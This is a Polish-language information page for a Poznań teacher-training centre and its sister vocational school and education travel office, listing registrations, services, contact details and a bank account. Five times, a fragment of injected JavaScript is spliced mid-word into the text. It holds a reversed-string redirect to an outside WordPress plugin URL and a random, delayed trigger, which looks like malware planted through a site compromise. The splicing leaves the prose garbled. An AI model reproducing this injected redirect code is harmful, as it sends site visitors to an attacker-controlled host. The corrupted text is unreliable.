Ośrodek Edukacyjny dla Nauczycieli (OEdN) jest niepubliczną akredytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towaną placówką doskonalenia nauczycieli, działającą na terenie województwa Wielkopolskiego. Organizujemy między innymi studia podyplomowe, kursy kwalifikacyjne dla nauczycieli, kursy doskonalące, szkolenia, konferencje, kursy językowe, edukacyjne wycieczki dla przedszkolaków i uczniów.

OŚRODEK EDUKACYJNY dla NAUCZYCIELI ( OEdN ) zarejestrowany w Kuratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium Oświaty w Poznaniu w  2000 r.  Zezwolenie WKO Nr 008/2000.

Od 4 maja 2010 r.  OEdN jest wpisany do ewidencji Marszałka Województwa Wielkopolskiego.                                                                                              

Zaświadczenie Nr DE.II.2.1.4330-4/10 o wpisie do Ewidencji Niepublicznych Placówek Doskonalenia Nauczycieli.

Ośrodek Edukacyjny dla Nauczycieli wystawia uczestnikom kursów zaświadczenia  zgodnie z Rozporządzenie Ministra Edukacji Narodowej z dnia 28 maja 2019 r. w sprawie placówek doskonalenia nauczycieli ( Dz. U. z dnia 6.06.2019 r. , poz. 1045 ) oraz faktury.  Świadectwa ukończenia studiów podyplomowych wystawia Elbląska Uczelnia Humanistyczno-Ekonomiczna w Elblągu.
EDUKACYJNY  OŚRODEK ZAWODOWY  ( EOZ ) – Zaświadczenie Nr 16/2012 o wpisie do ewidencji szkół i placówek niepublicznych z dnia 31.08.2012 r. wydane przez Prezydenta Miasta Poznania.  EOZ  jest placówką kształcenia ustawicznego. Realizuje kursy kwalifikacyjne zawodowe, kursy umiejętności zawodowych, kursy kompetencji ogólnych, kursy umożliwiające uzyskanie i uzupełnianie wiedzy, umiejętności i kwalifikacji zawodowych.

Zgłoszenia pisemne na organizowane przez nas szkolenia , kursy kwalifikacyjne, wycieczki edukacyjne, konferencje prosimy przesyłać drogą internetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tową (link na stronie www.oedn.pl – karta zgłoszenia ).
Informacja telefoniczna  502 624 093 

Kontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bankowe  dla  OEdN  oraz EOZ  w Poznaniu :

Santander Bank  Nr  62 1090 1450 0000 0001 1991 2285
BIURO USŁUG EDUKACYJNYCH ( BUE )  założone w 1996r posiada zezwolenie Wojewody Wielkopolskiego na prowadzenie działalności w zakresie turystyki :

Nr  zezwolenia 012.  Zezwolenie Ministerstwa Sportu i Turystyki – 012 z, nr ewidencyjny 01304 ( czasowo zawieszone).

BUE  świadczy  usługi   w zakresie  organizacji  imprez  edukacyjnych,  turystycznych  w  kraju  i  zagranicą.

Ponadtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, wspomaga działania OEdN w zakresie realizacji programów edukacyjnych dla nauczycieli  i  uczniów.


Nasz adres:

Ośrodek Edukacyjny dla Nauczycieli
Edukacyjny Ośrodek Zawodowy
Biuro Usług Edukacyjnych

ul. Tomickiego 16
61-116 Poznań
Tel. 502 624 093